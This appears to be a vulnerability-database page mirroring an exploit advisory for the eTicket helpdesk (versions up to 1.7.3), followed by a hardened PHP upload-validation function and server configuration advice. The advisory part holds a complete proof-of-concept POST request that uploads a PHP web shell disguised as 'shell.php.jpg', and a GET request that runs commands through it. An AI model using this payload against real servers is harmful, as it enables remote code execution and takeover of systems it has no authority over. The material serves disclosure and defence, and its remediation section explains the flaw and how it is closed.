eTicket <= 1.7.3 File Upload Filter Bypass (Remote PHP Code Execution)

Vulnerability ID: 1040596
Vulnerability type:
Published: 2015-12-22
Updated: 2015-12-22
CVE: N/A
CNNVD-ID: N/A
Platform: N/A
CVSS score: N/A
| Source
https://cxsecurity.com/issue/WLB-2015120243
| Details
Vulnerability details have not yet been disclosed.
| Exploit (EXP)
# Exploit Title: eTicket <= 1.7.3 File Upload Filter Bypass (Remote PHP Code Execution)
# Date: 17/11/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Advisory URL: https://www.nsecurity.org/advisories/
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://www.eticketsupport.com
# Version: <= 1.7.3
# Tested on:
#     Apache 2.2
#     PHP 5.1
#     MySQL 5.4


Summary: eTicket is a PHP-based electronic support ticket system that can receive tickets via email (POP3/pipe) or a web form.
It also offers a ticket manager with many features, and is an easy-to-install, easy-to-use helpdesk solution for any website.


1. PoC request

POST /eticket/open.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/eticket/
Cookie: Xplico=o0treq4pla0r3acd51d5131p76; PHPSESSID=0380uicd4n00ambkpfaucv6mm4
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1321807899848630298734395199
Content-Length: 1328

-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="name"

Saeid
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="email"

bytecod3r@gmail.com
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="email_confirm"

bytecod3r@gmail.com
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="phone"


-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="cat"

1
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="subject"

Test
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="message"

test
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="pri"

1
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="attachment"; filename="shell.php.jpg"
Content-Type: image/jpeg

<?php echo "\n\n"; passthru($_GET['cmd']); ?>

-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="submit_x"

Open Ticket
-----------------------------1321807899848630298734395199--


2. Click "View Open Tickets" in the control panel and get the file name; it should be something like xxx_shell.php.jpg

3. GET /eticket/attachments/590_shell.php.jpg?cmd=ls HTTP/1.1
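The PoC works because the upload filter accepts a name carrying two extensions (shell.php.jpg) and keeps the original name on disk, while Apache's AddHandler-based PHP mapping treats every dotted segment as an extension. The following is an added example of a hardened upload check for a PHP application, not eTicket's own code; validate_attachment() and the store directory are assumed names, and it assumes PHP 7+ (random_bytes) with the fileinfo extension.

```php
<?php
// Added example (not eTicket's code): hardened attachment validation that
// rejects multi-extension names, verifies content with finfo, and stores the
// file under a random server-chosen name. Assumes PHP 7+ and ext/fileinfo.

function validate_attachment(array $file, string $storeDir): string
{
    // Allowlist: extension => MIME types finfo must report for the bytes.
    $allowed = [
        'jpg' => ['image/jpeg'],
        'png' => ['image/png'],
        'pdf' => ['application/pdf'],
    ];

    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }

    // Use only the base name; drop any directory part the client supplied.
    $name = basename($file['name']);

    // Exactly one extension is permitted: "shell.php.jpg" contains two dots
    // and is rejected here, before any handler could ever see it.
    if (preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$/', $name, $m) !== 1) {
        throw new RuntimeException('invalid file name');
    }
    $ext = strtolower($m[1]);
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // Check the actual bytes, not the client-chosen Content-Type header
    // (the PoC sends image/jpeg for a file that starts with "<?php").
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, $allowed[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }

    // Never reuse the original name: a random name cannot carry extensions
    // or path characters chosen by the uploader.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = rtrim($storeDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store attachment');
    }
    return $stored;
}

// Usage (assumed path): validate_attachment($_FILES['attachment'], '/srv/eticket-data/attachments');
```

The store directory should sit outside the web root and be served through a download script, or at minimum have PHP execution disabled for it (for example `php_admin_flag engine off` in the Apache directory configuration), so that even a polyglot image can never be executed.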